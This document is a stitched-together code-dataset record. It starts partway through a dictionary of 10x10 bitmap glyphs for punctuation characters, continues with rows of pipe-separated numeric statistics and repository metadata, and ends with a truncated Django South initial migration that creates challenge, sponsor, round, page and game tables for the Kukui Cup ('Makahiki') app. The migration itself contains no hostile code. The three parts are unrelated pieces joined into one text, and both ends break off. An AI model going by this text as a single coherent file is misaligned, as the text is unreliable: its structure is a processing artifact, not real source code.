1, 0, 1, 0, 0, 1, 0, 0, 0], [0, 1, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 1, 1, 0, 0, 1, 1, 1, 0], [0, 0, 0, 0, 1, 0, 1, 0, 1, 0], [0, 0, 0, 1, 0, 0, 1, 0, 1, 0], [0, 0, 0, 0, 0, 0, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "&": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 1, 0, 0], [0, 0, 1, 0, 1, 1, 1, 1, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "'": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "(": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0]], ")": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "*": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "+": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ",": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "-": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ".": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "/": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ":": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ";": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "<": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "=": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], ">": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "?": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "@": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 1, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0, 0, 1, 0, 0], [0, 1, 0, 0, 1, 1, 1, 0, 1, 0], [0, 1, 0, 1, 0, 1, 0, 0, 1, 0], [0, 0, 0, 1, 0, 1, 0, 0, 1, 0], [0, 0, 1, 1, 0, 1, 0, 1, 0, 0], [0, 1, 0, 1, 1, 1, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0, 0, 0, 0]], "[": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "\\": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "]": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "^": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 1, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "_": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1, 1, 1, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "`": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "{": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "|": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "}": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]], "~": [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1, 1, 0, 1, 0, 0, 0], [0, 0, 1, 0, 0, 1, 1, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]}
| 1,209.263158
| 22,248
| 0.322685
| 6,952
| 22,976
| 1.066312
| 0.015823
| 1.419668
| 1.924322
| 2.320248
| 0.917577
| 0.917577
| 0.917577
| 0.917577
| 0.917442
| 0.916498
| 0
| 0.426205
| 0.303752
| 22,976
| 18
| 22,249
| 1,276.444444
| 0.037194
| 0.03038
| 0
| 0
| 0
| 30
| 0.438247
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
4fa1d7b2cd3df9056a7b9c206fb3fc27a81f5b2e
| 17,435
|
py
|
Python
|
makahiki/apps/managers/challenge_mgr/migrations/0001_initial.py
|
justinslee/Wai-Not-Makahiki
|
4b7dd685012ec64758affe0ecee3103596d16aa7
|
[
"MIT"
] | 1
|
2015-07-22T11:31:20.000Z
|
2015-07-22T11:31:20.000Z
|
makahiki/apps/managers/challenge_mgr/migrations/0001_initial.py
|
justinslee/Wai-Not-Makahiki
|
4b7dd685012ec64758affe0ecee3103596d16aa7
|
[
"MIT"
] | null | null | null |
makahiki/apps/managers/challenge_mgr/migrations/0001_initial.py
|
justinslee/Wai-Not-Makahiki
|
4b7dd685012ec64758affe0ecee3103596d16aa7
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'ChallengeSetting'
db.create_table('challenge_mgr_challengesetting', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('site_name', self.gf('django.db.models.fields.CharField')(default='My site', max_length=50)),
('site_domain', self.gf('django.db.models.fields.CharField')(default='localhost', max_length=100)),
('site_logo', self.gf('django.db.models.fields.files.ImageField')(max_length=255, null=True, blank=True)),
('competition_name', self.gf('django.db.models.fields.CharField')(default='Kukui Cup', max_length=50)),
('theme', self.gf('django.db.models.fields.CharField')(default='theme-forest', max_length=50)),
('competition_team_label', self.gf('django.db.models.fields.CharField')(default='Team', max_length=50)),
('use_cas_auth', self.gf('django.db.models.fields.BooleanField')(default=False)),
('cas_server_url', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('cas_auth_text', self.gf('django.db.models.fields.TextField')(default='###I have a CAS email', max_length=255)),
('use_ldap_auth', self.gf('django.db.models.fields.BooleanField')(default=False)),
('ldap_server_url', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('ldap_search_base', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('ldap_auth_text', self.gf('django.db.models.fields.TextField')(default='###I have a LDAP email', max_length=255)),
('use_internal_auth', self.gf('django.db.models.fields.BooleanField')(default=False)),
('internal_auth_text', self.gf('django.db.models.fields.TextField')(default='###Others', max_length=255)),
('wattdepot_server_url', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('email_enabled', self.gf('django.db.models.fields.BooleanField')(default=False)),
('contact_email', self.gf('django.db.models.fields.CharField')(default='CHANGEME@example.com', max_length=100)),
('email_host', self.gf('django.db.models.fields.CharField')(max_length=100, null=True, blank=True)),
('email_port', self.gf('django.db.models.fields.IntegerField')(default=587)),
('email_use_tls', self.gf('django.db.models.fields.BooleanField')(default=True)),
('landing_slogan', self.gf('django.db.models.fields.TextField')(default='The Kukui Cup: Lights off, game on!', max_length=255)),
('landing_introduction', self.gf('django.db.models.fields.TextField')(default='Aloha! Welcome to the Kukui Cup.', max_length=500)),
('landing_participant_text', self.gf('django.db.models.fields.TextField')(default='###I am registered', max_length=255)),
('landing_non_participant_text', self.gf('django.db.models.fields.TextField')(default='###I am not registered.', max_length=255)),
('about_page_text', self.gf('django.db.models.fields.TextField')(default="For more information, please go to <a href='http://kukuicup.org'>kukuicup.org</a>.")),
))
db.send_create_signal('challenge_mgr', ['ChallengeSetting'])
# Adding model 'UploadImage'
db.create_table('challenge_mgr_uploadimage', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('image', self.gf('django.db.models.fields.files.ImageField')(max_length=255, null=True, blank=True)),
))
db.send_create_signal('challenge_mgr', ['UploadImage'])
# Adding model 'Sponsor'
db.create_table('challenge_mgr_sponsor', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('challenge', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.ChallengeSetting'])),
('priority', self.gf('django.db.models.fields.IntegerField')(default='1')),
('name', self.gf('django.db.models.fields.CharField')(max_length=200)),
('url', self.gf('django.db.models.fields.CharField')(max_length=200)),
('logo_url', self.gf('django.db.models.fields.CharField')(max_length=200, null=True, blank=True)),
('logo', self.gf('django.db.models.fields.files.ImageField')(max_length=255, null=True, blank=True)),
))
db.send_create_signal('challenge_mgr', ['Sponsor'])
# Adding model 'RoundSetting'
db.create_table('challenge_mgr_roundsetting', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(default='Round 1', max_length=50)),
('start', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2012, 6, 16, 12, 47, 16, 115))),
('end', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2012, 6, 23, 12, 47, 16, 169))),
))
db.send_create_signal('challenge_mgr', ['RoundSetting'])
# Adding model 'PageInfo'
db.create_table('challenge_mgr_pageinfo', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=50)),
('label', self.gf('django.db.models.fields.CharField')(max_length=100)),
('title', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
('introduction', self.gf('django.db.models.fields.TextField')(max_length=1000, null=True, blank=True)),
('priority', self.gf('django.db.models.fields.IntegerField')(default=1)),
('url', self.gf('django.db.models.fields.CharField')(default='/', max_length=255)),
('unlock_condition', self.gf('django.db.models.fields.CharField')(default='True', max_length=255)),
))
db.send_create_signal('challenge_mgr', ['PageInfo'])
# Adding model 'PageSetting'
db.create_table('challenge_mgr_pagesetting', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.PageInfo'])),
('game', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.GameInfo'], null=True, blank=True)),
('widget', self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True)),
('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
))
db.send_create_signal('challenge_mgr', ['PageSetting'])
# Adding unique constraint on 'PageSetting', fields ['page', 'game', 'widget']
db.create_unique('challenge_mgr_pagesetting', ['page_id', 'game_id', 'widget'])
# Adding model 'GameInfo'
db.create_table('challenge_mgr_gameinfo', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=50)),
('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
('priority', self.gf('django.db.models.fields.IntegerField')(default=1)),
))
db.send_create_signal('challenge_mgr', ['GameInfo'])
# Adding model 'GameSetting'
db.create_table('challenge_mgr_gamesetting', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('game', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['challenge_mgr.GameInfo'])),
('widget', self.gf('django.db.models.fields.CharField')(max_length=50)),
('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
))
db.send_create_signal('challenge_mgr', ['GameSetting'])
# Adding unique constraint on 'GameSetting', fields ['game', 'widget']
db.create_unique('challenge_mgr_gamesetting', ['game_id', 'widget'])
def backwards(self, orm):
# Removing unique constraint on 'GameSetting', fields ['game', 'widget']
db.delete_unique('challenge_mgr_gamesetting', ['game_id', 'widget'])
# Removing unique constraint on 'PageSetting', fields ['page', 'game', 'widget']
db.delete_unique('challenge_mgr_pagesetting', ['page_id', 'game_id', 'widget'])
# Deleting model 'ChallengeSetting'
db.delete_table('challenge_mgr_challengesetting')
# Deleting model 'UploadImage'
db.delete_table('challenge_mgr_uploadimage')
# Deleting model 'Sponsor'
db.delete_table('challenge_mgr_sponsor')
# Deleting model 'RoundSetting'
db.delete_table('challenge_mgr_roundsetting')
# Deleting model 'PageInfo'
db.delete_table('challenge_mgr_pageinfo')
# Deleting model 'PageSetting'
db.delete_table('challenge_mgr_pagesetting')
# Deleting model 'GameInfo'
db.delete_table('challenge_mgr_gameinfo')
# Deleting model 'GameSetting'
db.delete_table('challenge_mgr_gamesetting')
models = {
'challenge_mgr.challengesetting': {
'Meta': {'object_name': 'ChallengeSetting'},
'about_page_text': ('django.db.models.fields.TextField', [], {'default': '"For more information, please go to <a href=\'http://kukuicup.org\'>kukuicup.org</a>."'}),
'cas_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a CAS email'", 'max_length': '255'}),
'cas_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'competition_name': ('django.db.models.fields.CharField', [], {'default': "'Kukui Cup'", 'max_length': '50'}),
'competition_team_label': ('django.db.models.fields.CharField', [], {'default': "'Team'", 'max_length': '50'}),
'contact_email': ('django.db.models.fields.CharField', [], {'default': "'CHANGEME@example.com'", 'max_length': '100'}),
'email_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_host': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'email_port': ('django.db.models.fields.IntegerField', [], {'default': '587'}),
'email_use_tls': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###Others'", 'max_length': '255'}),
'landing_introduction': ('django.db.models.fields.TextField', [], {'default': "'Aloha! Welcome to the Kukui Cup.'", 'max_length': '500'}),
'landing_non_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am not registered.'", 'max_length': '255'}),
'landing_participant_text': ('django.db.models.fields.TextField', [], {'default': "'###I am registered'", 'max_length': '255'}),
'landing_slogan': ('django.db.models.fields.TextField', [], {'default': "'The Kukui Cup: Lights off, game on!'", 'max_length': '255'}),
'ldap_auth_text': ('django.db.models.fields.TextField', [], {'default': "'###I have a LDAP email'", 'max_length': '255'}),
'ldap_search_base': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'ldap_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site_domain': ('django.db.models.fields.CharField', [], {'default': "'localhost'", 'max_length': '100'}),
'site_logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'site_name': ('django.db.models.fields.CharField', [], {'default': "'My site'", 'max_length': '50'}),
'theme': ('django.db.models.fields.CharField', [], {'default': "'theme-forest'", 'max_length': '50'}),
'use_cas_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_internal_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_ldap_auth': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'wattdepot_server_url': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'challenge_mgr.gameinfo': {
'Meta': {'ordering': "['priority']", 'object_name': 'GameInfo'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'})
},
'challenge_mgr.gamesetting': {
'Meta': {'ordering': "['game', 'widget']", 'unique_together': "(('game', 'widget'),)", 'object_name': 'GameSetting'},
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'game': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['challenge_mgr.GameInfo']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'widget': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'challenge_mgr.pageinfo': {
'Meta': {'ordering': "['priority']", 'object_name': 'PageInfo'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'introduction': ('django.db.models.fields.TextField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'unlock_condition': ('django.db.models.fields.CharField', [], {'default': "'True'", 'max_length': '255'}),
